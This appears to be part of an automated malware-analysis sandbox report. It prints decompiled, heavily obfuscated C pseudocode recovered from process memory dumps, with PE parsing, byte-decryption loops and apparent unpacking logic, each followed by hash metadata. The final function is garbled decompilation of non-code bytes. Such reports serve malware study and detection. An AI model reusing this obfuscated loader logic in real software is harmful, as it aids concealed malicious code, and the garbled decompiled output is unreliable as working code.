        										 *0x24497cd = 0x77eb;
        										 *0x244980d = 0x1c28;
        										if(_v20 != (_v80 ^ 0x2a823c2b) + 0x138527e2) {
        											asm("sbb edx, edx");
        											 *0x24497d5 =  *0x24497d5 + _t178;
        											 *0x2449801 = 0x7223;
        											 *0x24497f9 =  *0x24497f9 ^ 0x00002bac;
        											 *0x24497d5 = 0x4f;
        											if(_v20 == (_v84 ^ 0x2a823c2b) + 0x138527e2) {
        												asm("adc ecx, 0x7518");
        												_t264 =  *0x2449795; // 0xff4dd7d5
        												asm("adc ecx, [0x2449749]");
        												 *0x2449795 = _t264;
        												 *0x2449851 = 0x6e1c;
        												_v16 = ( *_v52 & 0x0000ffff) - 0x00003f01 ^ 0x000020b6;
        											}
        										} else {
        											_v52 = _v36;
        										}
        									} else {
        										 *0x2449789 = _t178;
        										 *_v60 = _v76;
        									}
        									 *0x24497c5 =  *0x24497c5 - 0x24497bd;
        									_v32 = (_v32 ^ 0x2a823c2b) - 0x00000001 ^ 0x2a823c2b;
        								}
        								 *0x2449859 = 0x5a3;
        								while(1) {
        									 *0x24497d1 = 0x2828;
        									 *0x2449749 = 0x171d;
        									 *0x2449779 = 0x6fba;
        									if(_v16 == 0x3bfa) {
        										goto L22;
        									}
        									_t185 =  *0x244974d; // 0x4bed
        									 *0x2449739 =  *0x2449739 | _t185;
        									asm("sbb dword [0x2449749], 0x3611");
        									 *0x2449801 =  *0x2449801 - 0x5d27;
        									 *_v60 = _v36 -  *_v48;
        									 *0x244983d =  *0x244983d & 0x00006bb7;
        									_v52 = _v36;
        									_t178 = ( *_v52 & 0x0000ffff) - 0x00003f01 ^ 0x000020b6;
        									 *0x2449749 = 0x3e12;
        									_v16 = ( *_v52 & 0x0000ffff) - 0x00003f01 ^ 0x000020b6;
        								}
        								goto L22;
        							}
        							asm("adc ebx, 0x2948");
        							_t404 = _t375 - 1;
        							do {
        								asm("sbb dword [0x2449805], 0x2449749");
        								 *0x24497c1 =  !( *0x24497c1);
        								 *0x24497d5 = 0x7fcc;
        								_t404 = _t404 + 1;
        								 *0x244974d = 0x406;
        								if(_t243 == (_v28 ^ 0x2a823c2b) + 0x138527e2) {
        									_t407 =  *0x2449270; // 0x2449018
        									_t225 =  *0x2449755; // 0x1f9a
        									 *0x2449791 =  *0x2449791 ^ _t225;
        									 *0x2449841 =  *0x2449841 - 0x24497bd;
        									_t406 = 0x26ceac77;
        									_v32 = _v64 +  *((intOrPtr*)( *_t407));
        								}
        								if(_t243 == _t404) {
        									 *0x2449851 =  *0x2449851 | 0x0244977d;
        									_t411 =  !_t404 &  *_v32;
        									_v76 = _t411;
        									 *0x2449845 = _t411;
        									_t406 = 0x26ceac77;
        								}
        								 *0x2449801 = 0x7fee;
        								_t178 = _v44;
        								_t243 = _t243 + 1;
        								 *0x24497f9 = 0x2307;
        							} while (_t243 < _t178);
        							goto L10;
        							L22:
        							_t229 = _v24;
        							_v36 = _v36 + _t229;
        							 *0x24497b9 = 0x2449795 +  *0x24497b9;
        							_v24 = _v24 - 1;
        							 *0x244974d = 0x28e3;
        						} while (_v24 >= 1);
        						 *0x2449741 =  *0x2449741 - _t229;
        						_v36 = _v36 - 1;
        						asm("sbb edx, edx");
        						_t383 =  *0x24491a0; // 0x2449028
        						asm("sbb dword [0x24497c1], 0x40bb");
        						_t71 = _t383 + 0x198; // 0x2449428
        						 *((intOrPtr*)( *_t71)) = _v36;
        						_v32 = 0xc6f8e435;
        						asm("sbb ecx, [0x2449805]");
        						 *0x2449861 = ( *0x2449861 & 0x000000ff) -  *0x244978d;
        						_v32 = (_v32 ^ 0x2a823c2b) + 0x138527e2;
        						_t281 =  *0x24491a0; // 0x2449028
        						_t75 = _t281 + 0x198; // 0x2449428
        						 *0x2449851 =  *0x2449851 & 0x000000ff |  *0x244973d;
        						_t76 = _t281 + 0x198; // 0x2449428
        						 *0x2449801 =  *0x2449801 & 0x000000ff &  *0x2449811;
        						asm("sbb [0x24497c5], ebx");
        						_t178 = _v32;
        						asm("sbb dword [0x24497d1], 0x2449785");
        						 *0x2449841 =  *0x2449841 & 0x02449795;
        						asm("adc edx, 0x5649");
        						_v32 =  *((intOrPtr*)( *((intOrPtr*)( *_t76)) + 0x78 + _v32 * 8 +  *((intOrPtr*)( *((intOrPtr*)( *_t75)) + 0x3c))));
        						 *0x2449781 =  *0x2449781 - 1;
        						 *0x2449795 = 0x6f09;
        						_t289 =  *0x24491a0; // 0x2449028
        						_t86 = _t289 + 0x198; // 0x2449428
        						_t229 =  *_t86;
        						 *0x244984d = 0x37b0;
        						if(_v32 == (_v28 ^ 0x2a823c2b) + 0x138527e2) {
        							 *_t229 =  *_t229 & 0x00000000;
        							while(1) {
        								L2:
        								_v24 = 0x1000;
        								goto L3;
        							}
        						}
        						 *0x24497f9 =  *0x24497f9 | 0x024497bd;
        						_t290 =  *0x24491a0; // 0x2449028
        						_t88 = _t290 + 0x198; // 0x2449428
        						asm("adc [0x2449741], ebx");
        						_v32 = _v32 +  *_t229;
        						_t394 = 0;
        						_v6 = 0;
        						 *0x2449801 =  *0x2449801 + _t406;
        						asm("sbb dword [0x2449755], 0x2449809");
        						 *0x2449785 =  *0x2449785 ^ 0x00002ae2;
        						_v8 =  *((intOrPtr*)( *((intOrPtr*)(_v32 + 0xc)) +  *((intOrPtr*)( *_t88))));
        						asm("sbb [0x2449839], ebx");
        						 *0x24497d5 = 0x7ba0;
        						if(_v32 == (_v28 ^ 0x2a823c2b) + 0x138527e2) {
        							L31:
        							_v24 = 0x4e402d8e;
        							_v5 = _t394;
        							_v64 = _t394;
        							_v32 = 0xc6f8e445;
        							_v20 = (_v32 ^ 0x2a823c2b) + 0x138527e2;
        							while(0 != 0) {
        								_v24 = ((_v20 - 0x138527e2 ^ 0x2a823c2b) - _t406 ^ _v32) * _v24;
        								_v5 = _v6;
        								_t309 = _v20;
        								_t206 = _v32;
        								if(_v24 <= 0xdf317079) {
        									_v24 = ((_t309 - 0x138527e2 ^ 0x2a823c2b) - _t406 & _t206) + _v24;
        								} else {
        									_v24 = _v24 - ((_t309 - 0x138527e2 ^ 0x2a823c2b) - _t406 | _t206);
        								}
        								_v5 = (_v5 & 0x000000ff) - 0x00003f01 ^ 0x000020b6;
        								if(_v5 != _v7) {
        									_v64 = 1;
        								}
        								_v20 = _v20 - 1;
        							}
        							if(_v64 == 0) {
        								L54:
        								return 0x2a823c2b;
        							}
        							_v6 = _t394;
        							_v64 = 1;
        							if((_v8 - 0x00003f01 & 0x0000ffff ^ 0x000020b6) != _v9) {
        								_v64 = _t394;
        							}
        							if(_v64 == 0) {
        								_t333 = _v68;
        								if(_v40 >= (_v28 ^ 0x2a823c2b) + 0x138527e2) {
        									_t178 = _v40;
        									_v40 = (_t333 ^ 0x2a823c2b) + _v40 + 0x138527e2;
        								} else {
        									_t178 = 0xec7ad81e - (_t333 ^ 0x2a823c2b) + _v40;
        									_v40 = 0xec7ad81e;
        								}
        								_t336 =  *0x24491a0; // 0x2449028
        								_t150 = _t336 + 0x198; // 0x2449428
        								 *((intOrPtr*)( *_t150)) = _t394;
        								_v20 = (_v32 ^ 0x2a823c2b) + 0x138527e2;
        								while(_v20 != 0) {
        									_v24 = ((_v20 - 0x138527e2 ^ 0x2a823c2b) - _t406 ^ _v32) * _v24;
        									_t349 = _v20;
        									_t397 = _v32;
        									if(_v24 <= 0xdf317079) {
        										_v24 = ((_t349 - 0x138527e2 ^ 0x2a823c2b) - _t406 & _t397) + _v24;
        									} else {
        										_v24 = _v24 - ((_t349 - 0x138527e2 ^ 0x2a823c2b) - _t406 | _t397);
        									}
        									_t229 = _v32 >> 1;
        									if(_v20 == _v32 >> 1) {
        										goto L2;
        									} else {
        										_v20 = _v20 - 1;
        										continue;
        									}
        								}
        							}
        							goto L54;
        						}
        						_t399 =  *0x2449791; // 0xff20b1f2
        						 *0x2449795 =  *0x2449795 ^ _t399;
        						_t361 = _v32;
        						asm("adc [0x2449815], edi");
        						_t400 =  *((intOrPtr*)(_t361 + 0xc));
        						 *0x24497c1 =  *0x24497c1 & _t361;
        						 *0x2449849 =  *0x2449849 & 0x00003abb;
        						_t364 = (_v28 ^ 0x2a823c2b) + 0x138527e2;
        						 *0x2449795 = 0x7215;
        						while(1) {
        							 *0x2449859 = 0x52d8;
        							if(_t364 >= _t400) {
        								break;
        							}
        							asm("sbb dword [0x244974d], 0x2449859");
        							if(_t364 == (_v28 ^ 0x2a823c2b) + 0x138527e2) {
        								_t218 =  *0x24491a0; // 0x2449028
        								 *0x2449815 = 0x4dbe;
        								_t101 = _t218 + 0x198; // 0x2449428
        								 *0x244983d = 0x207f;
        								_v56 =  *((intOrPtr*)( *_t101));
        							}
        							_v56 = _v56 + 1;
        							 *0x24497fd = 0x3248;
        							_t364 = _t364 + 1;
        						}
        						 *0x2449805 =  *0x2449805 - _t406;
        						_v6 =  *_v56;
        						_t394 = 0;
        						goto L31;
        					}
        				}
        			}

        Memory Dump Source
        • Source File: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
        • Associated: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: cc32532320c0c5f0377c12a090dee165773b7f94cd621ca716219ec65b1d615a
        • Instruction ID: 230f328b7ed7306ccd4df4d7ddeeebb11073eb3c2d24e94346e8ed64aee2fa72
        • Opcode Fuzzy Hash: cc32532320c0c5f0377c12a090dee165773b7f94cd621ca716219ec65b1d615a
        • Instruction Fuzzy Hash: 93326878E84615CFDB0CCFA9E4A49AFBBF2FB48314B14886EC40A67381DB351956DB50
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 78%
        			E0245AC60(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, signed int _a16) {
        				signed int _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				signed int* _v20;
        				signed int _v24;
        				signed int _v28;
        				signed int* _v32;
        				signed int* _v36;
        				signed int* _v40;
        				signed int _v44;
        				intOrPtr _v48;
        				signed int _v52;
        				char _v56;
        				char _v60;
        				char _v64;
        				char _v72;
        				intOrPtr _v76;
        				char _v84;
        				intOrPtr _v88;
        				intOrPtr _v92;
        				char _v108;
        				void* __esi;
        				intOrPtr _t223;
        				signed int _t224;
        				signed int _t251;
        				intOrPtr _t269;
        				signed int _t270;
        				signed int _t470;
        				void* _t471;
        
        				_v8 = 0xc6f8e435;
        				_v28 = 0xc6f8e434;
        				_v12 =  *((intOrPtr*)( *((intOrPtr*)(_a16 + 0x190)))) +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a16 + 0x190)))) + 0x3c));
        				_v24 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        				_v16 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        				_v48 =  *((intOrPtr*)(_v12 + 0x50)) - 0xc;
        				_t223 = _v12;
        				if(( *(_v12 + 0x54) &  *((intOrPtr*)(_v12 + 0x38)) - 0x00000001) == 0) {
        					_t224 =  *((intOrPtr*)(_t223 + 0x54));
        				} else {
        					_t224 =  *((intOrPtr*)(_v12 + 0x38)) + ( *(_v12 + 0x54) &  !( *((intOrPtr*)(_t223 + 0x38)) - 1));
        				}
        				_a16 = _t224;
        				_v40 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        				_v44 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        				 *_a12 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        				_v44 = 0xc6f8e434;
        				_v44 = 0xc6f8e40b;
        				_v44 = 0xc6f8e40a;
        				_v44 = 0xc6f8e409;
        				while(((_v28 ^ 0x2a823c2b) + 0x138527e2) * _a16 < (_v8 ^ 0x2a823c2b) + _v48 + 0x138527e2) {
        					_v16 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        					_v24 = _a16 + _a8;
        					_v20 = E02459F4A(_v12, _a8, _v24);
        					_v44 = 0xc6f8e40d;
        					E0245A4DE((_v44 ^ 0x2a823c2b) + 0x138527e2,  &_v72);
        					if(_v20 == 0) {
        						L7:
        						E0245A3D4( &_v84, _v24, 0xc);
        						_t251 = 0xc6f8e435;
        						_v52 = 0xc6f8e435;
        						_v56 = 0xc6f8e434;
        						_v60 = 0xc6f8e40b;
        						_v64 = 0xc6f8e40a;
        						_v32 =  &_v52;
        						_v36 =  &_v56;
        						_v20 =  &_v60;
        						_v40 =  &_v64;
        						_v44 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        						while(_v16 == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
        							if(_t251 != 0xc6f8e40b) {
        								_v16 = (_v28 ^ 0x2a823c2b) + 0x138527e2;
        								_t470 = _t251 ^ 0x2a823c2b;
        								_v44 = _v44 + _t470 + 0x138527e2;
        								if(_v44 == (_v28 ^ 0x2a823c2b) + 0x138527e2) {
        									E0245A9BA( &_v84, 0xc, (_v8 ^ 0x2a823c2b) + 0x138527e2);
        								}
        								if(( *(_t471 + ( *_v32 ^ 0x2a823c2b) + 0x13852792) & 0x000000ff) == (_v8 ^ 0x2a823c2b) + 0x138527e2 || ( *(_t471 + ( *_v36 ^ 0x2a823c2b) + 0x13852792) & 0x000000ff) == (_v8 ^ 0x2a823c2b) + 0x138527e2 || ( *(_t471 + ( *_v20 ^ 0x2a823c2b) + 0x13852792) & 0x000000ff) == (_v8 ^ 0x2a823c2b) + 0x138527e2 || ( *(_t471 + ( *_v40 ^ 0x2a823c2b) + 0x13852792) & 0x000000ff) == (_v8 ^ 0x2a823c2b) + 0x138527e2 ||  *((intOrPtr*)(_t471 + ( *_v32 ^ 0x2a823c2b) + 0x13852796)) != ( *(_t471 + ( *_v36 ^ 0x2a823c2b) + 0x13852792) ^  *(_t471 + ( *_v32 ^ 0x2a823c2b) + 0x13852792) |  *(_t471 + ( *_v20 ^ 0x2a823c2b) + 0x13852792)) ||  *((intOrPtr*)(_t471 + ( *_v36 ^ 0x2a823c2b) + 0x13852796)) != ( *(_t471 + ( *_v20 ^ 0x2a823c2b) + 0x13852792) ^  *(_t471 + ( *_v36 ^ 0x2a823c2b) + 0x13852792) |  *(_t471 + ( *_v40 ^ 0x2a823c2b) + 0x13852792)) ||  *((intOrPtr*)(_t471 + ( *_v20 ^ 0x2a823c2b) + 0x13852796)) != ( *(_t471 + ( *_v40 ^ 0x2a823c2b) + 0x13852792) ^  *(_t471 + ( *_v20 ^ 0x2a823c2b) + 0x13852792) |  *(_t471 + ( *_v32 ^ 0x2a823c2b) + 0x13852792)) ||  *((intOrPtr*)(_t471 + ( *_v40 ^ 0x2a823c2b) + 0x13852796)) != ( *(_t471 + ( *_v40 ^ 0x2a823c2b) + 0x13852792) ^  *(_t471 + ( *_v32 ^ 0x2a823c2b) + 0x13852792) |  *(_t471 + ( *_v36 ^ 0x2a823c2b) + 0x13852792))) {
        									L20:
        									_v16 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
        								} else {
        									_push( &_v84);
        									if(E0245AB1C() != _v76) {
        										goto L20;
        									}
        								}
        								_t251 = (_v28 ^ 0x2a823c2b) + _t470 + 0x138527e2 ^ 0x2a823c2b;
        								continue;
        							}
        							break;
        						}
        						if(_v16 != (_v8 ^ 0x2a823c2b) + 0x138527e2) {
        							E0245A3D4( &_v108, _v24, 0x18);
        							if((_v8 ^ 0x2a823c2b) + 0x138527e2 != _v44) {
        								E0245A9BA( &_v108, 0x18, (_v8 ^ 0x2a823c2b) + 0x138527e2);
        							}
        							_v40 = _v24 + 0x18;
        							E0245A3D4(_v92 + _a4, _v40, _v88);
        							if((_v8 ^ 0x2a823c2b) + 0x138527e2 != _v44) {
        								E0245A9BA(_v92 + _a4, _v88, 0);
        							}
        							 *_a12 =  *_a12 + _v88;
        							_t269 = _v88;
        							goto L30;
        						} else {
        							_t270 = (_v28 ^ 0x2a823c2b) + _a16 + 0x138527e2;
        						}
        					} else {
        						E0245A3D4( &_v72, _v20, (_v44 ^ 0x2a823c2b) + 0x138527e2);
        						_v44 = _v24;
        						_v44 = _v44 - _a8;
        						if(_v44 < _v20[4] + _v20[3]) {
        							goto L7;
        						} else {
        							_t269 = _v20[3] + _v20[2] - _v44;
        							L30:
        							_t270 = _t269 + _a16;
        						}
        					}
        					_a16 = _t270;
        				}
        				return _a4;
        			}

        Memory Dump Source
        • Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
        • Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c39beed9d773ac50f061575997088ebc726d784d305f87c0bd5237156629c58b
        • Instruction ID: f598e2546ef8a528e373b9f0d2d0c46e1e661f93a1333342073ab7094dc0eda9
        • Opcode Fuzzy Hash: c39beed9d773ac50f061575997088ebc726d784d305f87c0bd5237156629c58b
        • Instruction Fuzzy Hash: 89F1D775B001199FCF08DFA8D8A19EEB7F2FF5D304B69445AE886EB352D630A945CB10
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 47%
        			E02442F44(signed int __edx, signed int _a8) {
        				signed int _v5;
        				signed int _v12;
        				signed int _v16;
        				signed int _v20;
        				intOrPtr _v24;
        				signed int _v28;
        				signed int _v32;
        				intOrPtr _v36;
        				signed int _v40;
        				signed int _v44;
        				signed int* _v48;
        				signed int* _v52;
        				intOrPtr _v56;
        				signed int _v60;
        				char _v64;
        				intOrPtr _v68;
        				void* __edi;
        				signed int* _t89;
        				signed int* _t91;
        				signed int _t100;
        				void* _t105;
        				signed int _t111;
        				intOrPtr _t118;
        				signed int _t119;
        				signed int _t123;
        				signed char _t143;
        				signed int* _t152;
        				intOrPtr* _t154;
        				signed int _t155;
        				signed int _t156;
        				signed int _t162;
        				signed int _t167;
        				signed int _t182;
        				intOrPtr _t186;
        				signed int _t189;
        				signed int _t190;
        				signed int _t196;
        				signed int _t213;
        				signed int _t215;
        				signed int _t229;
        				signed int _t230;
        				intOrPtr _t239;
        
        				_t218 = __edx;
        				 *0x2449795 =  *0x2449795 & 0x02449815;
        				_v44 = 0xc6f8e434;
        				 *0x244980d = 0x2820;
        				_v60 = 0xc6f8e409;
        				 *0x244980d = 0x37e9;
        				_v20 = 0xc6f8e435;
        				_t239 =  *0x24492b0; // 0x1
        				 *0x2449801 = 0x37a0;
        				if(_t239 != 0) {
        					return 0;
        				} else {
        					_v40 = 0xc6f8e635;
        					asm("sbb [0x24497c9], edi");
        					 *0x24497fd = 0x2449795 +  *0x24497fd;
        					asm("adc ebx, 0x4a6a");
        					 *0x2449789 =  *0x2449789 - 0 +  *0x2449791;
        					 *0x2449791 =  *0x2449791 - ( *0x2449805 & 0x000000ff);
        					_v60 = (_v40 ^ 0x2a823c2b) + 0x138527e2;
        					_t162 =  *0x24497f9; // 0x8b744035
        					 *0x24497d1 =  *0x24497d1 ^ _t162;
        					asm("adc [0x244983d], ecx");
        					_v60 = (_v20 ^ 0x2a823c2b) + 0x138527e2;
        					 *0x2449741 =  *0x2449741 | 0x00005d67;
        					 *0x244980d =  *0x244980d + ( *0x244974d & 0x000000ff);
        					_v60 = (_v20 ^ 0x2a823c2b) + 0x138527e2;
        					 *0x244984d = 0x528e;
        					 *0x244973d = 0x6e19;
        					if(_a8 == 0xc6f8e403) {
        						_t89 =  *0x2449020; // 0x244925c
        						 *0x2449741 =  *0x2449741 - 0x2507;
        						_v48 = _t89;
        						 *0x244985d =  *0x244985d |  *0x2449779 & 0x000000ff;
        						_t91 =  *0x2449224; // 0x2449210
        						 *0x244984d =  *0x244984d & 0x02449805;
        						_v52 = _t91;
        						 *0x2449845 =  *0x2449845 + 0 +  *0x2449809;
        						 *0x2449745 =  *0x2449745 + 1;
        						 *0x244978d = 0x7631;
        						 *0x24492a8 =  *_v48;
        						 *0x2449861 =  *0x2449861 ^ 0x00000cd2;
        						 *0x24497d1 =  *0x24497d1 & 0x000018f1;
        						 *0x2449751 =  *0x2449751 + 0x2449845;
        						__eflags =  *0x2449751;
        						 *0x24492ac =  *_v52;
        					} else {
        						 *0x2449855 = 0xed4;
        						if(_a8 == 0xc6f8e417) {
        							 *0x24497c1 = 0x4395;
        							_t213 =  *0x24491a0; // 0x2449028
        							 *0x24497d5 = 0x6280;
        							_v40 = 0xc6f8e475;
        							 *0x2449781 = 0x2465;
        							_v60 = _t213;
        							__eflags =  *0x24492a8; // 0x417e13
        							if(__eflags != 0) {
        								__eflags =  *0x24492ac; // 0x41b5af
        								if(__eflags != 0) {
        									_push( &_v64);
        									 *0x2449751 =  *0x2449751 - 0x7ddd;
        									 *0x24497c1 =  *0x24497c1 | 0x02449845;
        									 *0x24497cd =  *0x24497cd - 0x1d21;
        									_push((_v40 ^ 0x2a823c2b) + 0x138527e2);
        									_push( *0x24492a4);
        									_t152 =  *0x24497b5; // 0x24497d5
        									 *0x2449815 =  *0x2449815 ^  *_t152;
        									_t154 =  *0x24491c0; // 0x2449428
        									_push( *0x24492a0);
        									 *0x2449795 =  *0x2449795 + 0x2449855;
        									 *0x244977d =  *0x244977d ^ 0x00007814;
        									 *0x2449789 =  *0x2449789 & 0x02449785;
        									_t155 = E02442209(_t213, __edx, 0x138527e2,  *_t154, 0x2449116, 1, 4);
        									 *0x24497bd =  *0x24497bd ^ 0x00006575;
        									__eflags = _t155;
        									if(_t155 != 0) {
        										 *0x24497d1 = 0x217c;
        										 *0x24492b4 = 0xc6f8e434;
        									}
        								}
        							}
        							 *0x24492b0 = 1;
        							 *0x2449851 = 0x5327;
        						} else {
        							 *0x2449815 = 0x68d8;
        							 *0x2449849 = 0x5515;
        							if(_a8 == 0xc6f8e419) {
        								_t156 =  *0x24492a8; // 0x417e13
        								_t215 =  *0x24492ac; // 0x41b5af
        								asm("sbb dword [0x244985d], 0x2449859");
        								 *0x2449845 = 0x18c1;
        								 *0x24492a0 = _t156;
        								 *0x2449845 = 0xa74;
        								 *0x24492a4 = _t215 - _t156 + 4;
        							}
        						}
        					}
        					_v40 = 0xc6f8e403;
        					 *0x24497c1 = 0x5d86;
        					_v56 = 0xc6f8e419;
        					 *0x24497fd =  *0x24497fd ^  *0x244985d & 0x000000ff;
        					_v60 = 0xc6f8e417;
        					asm("adc [0x2449839], eax");
        					_t100 =  *0x24492b4; // 0xc6f8e434
        					 *0x2449855 = 0x5025;
        					if((_t100 ^ 0x2a823c2b) + 0x138527e2 == 0) {
        						L21:
        						_t79 = (_a8 ^ 0x2a823c2b) + 0x138527e2; // 0xda7e0c16
        						_t229 = (_v44 ^ 0x2a823c2b) + _t79;
        						while(1) {
        							_t230 = _t229 ^ 0x2a823c2b;
        							_t167 = _t230 ^ 0x2a823c2b;
        							_t87 = _t167 + 0x138527e2; // 0xee0333f8
        							_t105 = _t87;
        							if(_t105 >= 0x28) {
        								break;
        							}
        							__eflags = _t230 - _v40;
        							if(_t230 == _v40) {
        								L25:
        								__eflags = _t230 - _v40 + _t230;
        								if(_t230 == _v40 + _t230) {
        									0x2859ba1(0xc66c634c);
        								}
        								__eflags = _t230 + 0xec7ad81e ^ 0x2a823c2b;
        								E02442F44(_t218, _t230 + 0xec7ad81e ^ 0x2a823c2b, _t230);
        								L28:
        								_t111 = _v44 ^ 0x2a823c2b;
        								__eflags = _t111;
        								_t86 = _t167 + 0x138527e2; // 0xda7e0c16
        								_t229 = _t111 + _t86;
        								continue;
        							}
        							__eflags = _t230 - _v56;
        							if(_t230 == _v56) {
        								goto L25;
        							}
        							__eflags = _t230 - _v60;
        							if(_t230 != _v60) {
        								goto L28;
        							}
        							goto L25;
        						}
        						return _t105;
        					}
        					asm("sbb edx, 0x6be3");
        					_v24 = (_v20 ^ 0x2a823c2b) + 0x138527e2;
        					_t118 =  *0x24492a4; // 0x37a0
        					_t182 =  *0x2449795; // 0xff4dd7d5
        					 *0x2449795 = _t182 &  *0x2449779;
        					_v36 = _t118;
        					_t119 =  *0x24492a0; // 0x417e13
        					_v32 = 0xc6f8e52d;
        					_v32 = 0xc6f8e409;
        					_v28 = _t119;
        					asm("adc edx, ebx");
        					_v32 = 0xc6f8e435;
        					_v12 = 0xc6f8e434;
        					_v20 = 0xc6f8e40b;
        					 *0x2449851 =  *0x2449851 - 0x3254;
        					asm("sbb [0x2449851], edx");
        					 *0x24497d1 =  *0x24497d1 ^ 0x0000334b;
        					_t186 =  *0x2449781; // 0x284c
        					 *0x244977d =  *0x244977d + _t186;
        					_t218 = 0xec7ad81e - (_v12 ^ 0x2a823c2b) + _v36;
        					 *0x244978d = 0x7dc0;
        					_v16 = 0xec7ad81e;
        					_v68 = 0xc6f8e408;
        					if(_v20 == 0xc6f8e435) {
        						goto L21;
        					} else {
        						goto L13;
        					}
        					do {
        						L13:
        						asm("adc dword [0x244977d], 0x4edd");
        						_t189 = _v12 ^ 0x2a823c2b;
        						 *0x244983d = 0x2c79;
        						_t42 = _t189 + 0x270a4fc4; // 0xee0333f8
        						_t190 = (_v12 ^ 0x2a823c2b) + _t42;
        						_t123 = _v16;
        						 *0x244985d =  *0x244985d - 0x2449785;
        						_t218 = _t123 % _t190;
        						asm("sbb eax, ecx");
        						 *0x2449841 =  *0x2449841 | _t190;
        						asm("sbb dword [0x2449809], 0x5631");
        						 *0x2449815 = 0x3d6a;
        						 *0x2449805 = 0x6570;
        						if(_t123 % _t190 == (_v20 ^ 0x2a823c2b) - (_v12 ^ 0x2a823c2b)) {
        							asm("sbb [0x2449751], edx");
        							_t143 =  *(_v16 + _v28);
        							_v5 = 0xee;
        							if(_v24 == 0) {
        								_v5 = (_v5 & 0x000000ff) + _v24;
        								_t218 = _v5 & 0x000000ff;
        								_v5 = ((_v32 ^ 0x2a823c2b) + 0x138527e2) * (_v5 & 0x000000ff);
        								_v5 = (_t143 ^ 0x0000003f) + 0x2f + (_v5 & 0x000000ff);
        								_t143 = _v5;
        							}
        							 *(_v16 + _v28) = _t143;
        						}
        						if((_v16 - 0x138527e2 ^ 0x2a823c2b) != _v32) {
        							_t196 = 0xec7ad81e - (_v12 ^ 0x2a823c2b) + _v16;
        							__eflags = _t196;
        						} else {
        							_v20 = (_v20 ^ 0x2a823c2b) - (_v12 ^ 0x2a823c2b) - 0x138527e2 ^ 0x2a823c2b;
        							_t196 = 0xec7ad81e - (_v12 ^ 0x2a823c2b) + _v36;
        						}
        						_v16 = _t196;
        					} while (_v20 != 0xc6f8e435);
        					goto L21;
        				}
        			}

        Memory Dump Source
        • Source File: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
        • Associated: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: cf37d778815b5c5410c4bd345a806caccfb08bcbda23945f25581fc76cf6c419
        • Instruction ID: 126b2907720bd0977da35cbc0d227528f0065ad7c70b349519b97b2f1d8d5b9c
        • Opcode Fuzzy Hash: cf37d778815b5c5410c4bd345a806caccfb08bcbda23945f25581fc76cf6c419
        • Instruction Fuzzy Hash: 74E17878E94614DFDB08CFA8E8949AF7BF1FB48314B148CAED405AB280DB745525EF10
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 77%
        			E0040168B(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* __esi, void* __fp0) {
        				intOrPtr* _t95;
        				void* _t96;
        				void* _t98;
        				intOrPtr* _t100;
        				void* _t102;
        				intOrPtr* _t104;
        				signed char _t111;
        				signed char _t112;
        				signed char _t113;
        				signed char _t114;
        				signed char _t127;
        				signed char _t128;
        				signed char _t132;
        				signed char _t133;
        				void* _t165;
        				void* _t168;
        				intOrPtr* _t169;
        				void* _t170;
        				void* _t171;
        				intOrPtr* _t172;
        				intOrPtr* _t187;
        				intOrPtr* _t188;
        				void* _t189;
        				intOrPtr* _t191;
        				signed char _t195;
        				intOrPtr* _t205;
        				signed char _t213;
        				signed char _t217;
        				intOrPtr* _t224;
        				intOrPtr* _t225;
        				void* _t226;
        				intOrPtr* _t229;
        				void* _t230;
        				intOrPtr* _t232;
        				intOrPtr* _t233;
        				void* _t236;
        				intOrPtr* _t237;
        				void* _t239;
        				void* _t241;
        				void* _t242;
        				void* _t243;
        				void* _t245;
        				void* _t246;
        				void* _t249;
        				void* _t251;
        				void* _t252;
        				void* _t253;
        				void* _t254;
        
        				_t232 = __esi;
        				_t168 = __ebx;
        				_t205 = __edx + __ecx;
        				 *__eax =  *__eax + __ebx;
        				_t253 = _t252 + __ecx;
        				 *_t205 =  *_t205 + __ebx;
        				 *__esi =  *__esi + __ecx;
        				_t95 = __eax + _t205;
        				 *_t95 =  *_t95 + _t205;
        				 *((intOrPtr*)(__ebx + 1)) =  *((intOrPtr*)(__ebx + 1)) + _t95;
        				asm("rol byte [ecx], cl");
        				_t224 = __edi + __ecx + 1;
        				_t242 = _t241 + _t205;
        				 *((intOrPtr*)(_t95 + 1)) =  *((intOrPtr*)(_t95 + 1)) + _t205;
        				_pop(_t96);
        				_t187 = __ecx + _t205 + __ebx;
        				_t5 = __esi + 1;
        				 *_t5 =  *((intOrPtr*)(__esi + 1)) + _t242;
        				asm("fild dword [ecx]");
        				if( *_t5 >= 0) {
        					asm("fiadd word [ecx]");
        				}
        				 *((intOrPtr*)(_t205 + 1)) =  *((intOrPtr*)(_t205 + 1)) + _t253;
        				asm("loopne 0x3");
        				_push(_t242);
        				_t169 = _t168 + _t253;
        				 *_t169 =  *_t169 + _t96;
        				_t243 = _t242 + _t253;
        				 *_t205 =  *_t205 + _t224;
        				_t233 = _t232 + _t253;
        				 *_t224 =  *_t224 + _t96;
        				 *0x1901ea01 =  *0x1901ea01 + _t187;
        				_t254 = _t253 + _t243;
